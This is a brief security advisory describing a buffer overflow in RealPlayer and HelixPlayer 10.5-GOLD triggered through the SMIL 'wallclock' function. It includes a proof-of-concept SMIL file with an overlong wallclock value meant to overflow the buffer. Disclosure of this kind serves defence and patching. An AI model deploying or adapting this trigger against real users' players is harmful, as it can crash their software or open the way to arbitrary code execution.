|
|
| |
| A vulnerabilty in the way RealNetworks' RealPlayer/HelixPlayer handles the wallclock function allows attackers to cause the program to overflow an internal buffer which in turn can be used to execute arbitrary code. |
| |
Credit:
The information has been provided by axis.
The original article can be found at: http://www.ph4nt0m.org
|
| |
Vulnerable Systems:
* RealNetworks' RealPlayer and HelixPlayer version 10.5-GOLD
Exploit:
<!--
author: axis
site: http://www.ph4nt0m.org
-->
<smil xmlns="http://www.w3.org/2000/SMIL20/CR/Language">
<body>
<par>
<img src="./1.jpg" begin="wallclock(12:00:00.999999999999999999999999999999999
99999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999+9)" dur="5s"/>
</par>
</body>
</smil>
|
|
|
